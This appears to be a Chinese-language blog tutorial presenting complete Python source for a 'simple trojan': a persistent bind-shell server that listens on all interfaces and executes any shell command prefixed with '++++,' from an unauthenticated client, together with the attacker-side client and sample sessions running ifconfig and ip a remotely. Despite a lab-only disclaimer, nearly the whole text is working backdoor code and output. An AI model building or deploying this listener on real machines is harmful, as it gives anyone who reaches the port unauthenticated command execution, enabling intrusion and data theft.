Python:socket实现简单木马
ps:服务端出错后会自动重新开始监听,可长期驻留后台运行
原理:将目标机本身作为TCP服务器,在所有网卡(0.0.0.0)上监听一个端口;攻击机通过socket远程连接后发送命令,由目标机执行并回传结果(即所谓的绑定式shell,bind shell)。注意:这条连接没有任何认证和加密,任何能访问到该端口的主机都可以用运行脚本的用户身份执行命令,只应在隔离的实验环境(虚拟机/内网靶场)中使用。
附上源码:
# 服务器端木马源码:
import os
import socket
import time
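# Unauthenticated bind shell: everything below executes commands sent by any
# TCP peer that can reach the port, as the user running this script.
# Lab / throw-away VM use only.
RESTART_DELAY = 1.0  # seconds to wait before re-creating a failed listener


def _reply_for(receive: str, client) -> str:
    """Compute the reply for one inbound message.

    Protocol (plain text, no authentication, no message framing):
      * '++++,<command>' -> run <command> through the local shell and return
        '执行结果:\\n' followed by its stdout (os.popen does not capture
        stderr; that goes to this process's own stderr).
      * anything else    -> echo the text with every '吗?' turned into '!'.

    Args:
        receive: the decoded message from the client.
        client: the peer address, used only for the console log line.
    """
    if receive.startswith('++++'):
        # partition() tolerates a missing ',' (the original split(',')[1]
        # raised IndexError, which restarted the whole listener).
        command = receive.partition(',')[2].strip()
        # Remote command execution by design: the text comes straight from the
        # network peer and is handed to the shell unchanged.
        reply = os.popen(command).read() if command else ''
        return f'执行结果:\n{reply}'
    print(f'收到{client}的消息:{receive}')
    return receive.replace('吗?', '!')


def _serve_client(channel: socket.socket, client) -> None:
    """Serve one connected client until it disconnects (recv() returns b'').

    Raises:
        OSError: on a reset / broken connection; the caller drops the client.
    """
    while True:
        data = channel.recv(1024)
        if not data:
            print(f'{client}已断开')
            return
        # errors='replace' keeps a multi-byte character split across two
        # recv() calls from raising UnicodeDecodeError.
        receive = data.decode(errors='replace')
        # sendall, not send: send() may deliver only part of a long reply.
        channel.sendall(_reply_for(receive, client).encode())


def attack(host: str = '0.0.0.0', port: int = 4456) -> None:
    """Listen on (host, port) forever and serve one client at a time.

    Security: there is no authentication and no encryption, so any host that
    can reach ``port`` on any interface (``host`` defaults to 0.0.0.0, i.e.
    every interface, as in the original) gets command execution as the user
    running this script.

    Args:
        host: address to bind; 0.0.0.0 keeps the original "all interfaces".
        port: TCP port to listen on (original hard-coded 4456).

    Returns only on KeyboardInterrupt. A per-client error drops that client
    and keeps the listener open; a listener error (bind/listen/accept) closes
    the listener and re-creates it after RESTART_DELAY. This replaces the
    original bare ``except:`` + recursive ``attack()`` restart, which grew the
    call stack on every error (eventually RecursionError), never closed the
    accepted socket, and re-bound in a tight loop while the port was busy.
    """
    while True:
        try:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as io:
                # Allows an immediate re-bind after a restart while old
                # connections on this port sit in TIME_WAIT (Linux/BSD
                # semantics). On Windows SO_REUSEADDR instead lets *another*
                # process bind the same port, so drop it when targeting Windows.
                io.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                io.bind((host, port))
                io.listen()
                print('服务器开始运行。。。')
                while True:
                    chanel, client = io.accept()
                    print(f'接收来自{client}的链接')
                    with chanel:  # accepted socket is always closed, even on error
                        try:
                            _serve_client(chanel, client)
                        except OSError as exc:
                            # Reset / broken pipe from this client only:
                            # drop it and go back to accept().
                            print(f'与{client}的连接出错: {exc}')
        except KeyboardInterrupt:
            print('服务器停止')
            return
        except OSError as exc:
            # socket()/bind()/listen()/accept() failed (e.g. port busy);
            # pause before retrying instead of spinning.
            print(f'监听失败: {exc},{RESTART_DELAY}秒后重试')
            time.sleep(RESTART_DELAY)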
# Start the listener only when this file is executed directly, not on import.
if __name__ == "__main__":
    attack()
# 攻击机源码:
import socket
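SERVER_HOST = '192.168.1.128'  # machine running the listener (original hard-coded value)
SERVER_PORT = 4456
REPLY_IDLE = 0.3  # seconds of silence after which a reply is considered complete


def _read_reply(sock: socket.socket, idle: float = REPLY_IDLE) -> bytes:
    """Read one complete reply from the server.

    The protocol has no length prefix or terminator, so the original single
    recv(1024) silently truncated any command output longer than 1 KiB.
    Block for the first chunk (a slow command may legitimately take a while),
    then keep reading until the server has been silent for ``idle`` seconds.

    Returns:
        The concatenated reply bytes, or b'' if the server closed the
        connection before sending anything.
    """
    sock.settimeout(None)
    chunks = [sock.recv(4096)]
    if not chunks[0]:
        return b''
    sock.settimeout(idle)
    try:
        while True:
            more = sock.recv(4096)
            if not more:  # server closed mid-reply; return what we have
                break
            chunks.append(more)
    except socket.timeout:
        pass  # idle gap: treat what has arrived as the full reply
    finally:
        sock.settimeout(None)
    return b''.join(chunks)


# Interactive client loop. Everything crosses the wire as plain text with no
# authentication; the server runs whatever follows '++++,' in its shell.
with socket.socket() as io:  # socket is closed on exit/exception (original leaked it)
    io.connect((SERVER_HOST, SERVER_PORT))
    while True:
        try:
            message = input('请输入信息:')
        except EOFError:  # Ctrl-D / end of piped input
            break
        if not message:
            # send(b'') puts nothing on the wire; the original then blocked
            # forever waiting for a reply that could never come.
            continue
        io.sendall(message.encode())
        receive = _read_reply(io)
        if not receive:
            print('服务器已关闭连接')
            break
        print(f'服务器回复:{receive.decode(errors="replace")}')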
使用范例:
# 范例一:
PS D:\vscode\security_python\socket_test> & C:/Users/郑际濠/AppData/Local/Programs/Python/Python38/python.exe d:/vscode/security_python/socket_test/socket_client.py
请输入信息:666
服务器回复:666
请输入信息:听的见吗?
服务器回复:听的见!
# 范例二:
请输入信息:++++,ifconfig
服务器回复:执行结果:
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.128 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::1252:ebcd:b4cf:c784 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:1c:18:34 txqueuelen 1000 (Ethernet)
RX packets 190 bytes 13531 (13.2 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 157 bytes 16850 (16.4 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 4 bytes 240 (240.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4 bytes 240 (240.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
# 范例三:
请输入信息:++++,ip a
服务器回复:执行结果:
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:1c:18:34 brd ff:ff:ff:ff:ff:ff
inet 192.168.1.128/24 brd 192.168.1.255 scope global dynamic noprefixroute eth0
valid_lft 1334sec preferred_lft 1334sec
inet6 fe80::1252:ebcd:b4cf:c784/64 scope link noprefixroute
valid_lft forever preferred_lft forever